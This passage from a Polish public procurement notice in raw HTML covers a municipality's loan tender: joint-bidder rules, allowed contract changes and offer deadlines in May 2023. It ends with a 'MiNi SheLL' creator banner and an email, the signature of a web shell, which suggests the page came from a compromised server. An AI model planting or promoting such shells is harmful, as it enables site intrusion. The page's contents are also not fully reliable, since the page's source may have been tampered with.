ustawy, o której mowa w art. 193<br/>ustawy Prawo bankowe).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. W przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, oświadczenie, o<br/>którym mowa w Rozdziale X ust. 2 SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>5. W przypadku o którym mowa w ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub<br/>usługi wykonają poszczególni Wykonawcy (Wzór oświadczenia stanowi Załącznik nr 3 do SWZ).<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, każdy z<br/>nich zobowiązany jest złożyć, na wezwanie Zamawiającego, podmiotowe środki dowodowe<br/>potwierdzające brak podstaw wykluczenia z postępowania, określone w Rozdziale X ust. 4 pkt 1<br/>SWZ, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z<br/>Rozdziałem VIII ust. 1 pkt 1.2 ppkt 1.2.2. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2. Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy w<br/>przypadku:<br/>1) zmiany adresu/siedziby zamawiającego lub Wykonawcy,<br/>2) zmian wpływających na wysokość kosztów, jeżeli zmiany te będą korzystne dla<br/>Zamawiającego,<br/>3) zmiany harmonogramu spłat rat kredytu na wniosek Zamawiającego. Zmiana harmonogramu<br/>wymaga zgody obu stron i zawarcia pisemnego aneksu do umowy,<br/>4) zmiany terminu realizacji zamówienia na wniosek zamawiającego, w związku z wcześniejszą<br/>spłatą kredytu,<br/>5) zmiany umowy są konieczne na skutek działania organów administracji lub instytucji<br/>upoważnionych do wydawania decyzji lub innych aktów władczych lub nadzorczych, związanych<br/>z realizacją umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kikol</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-04 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com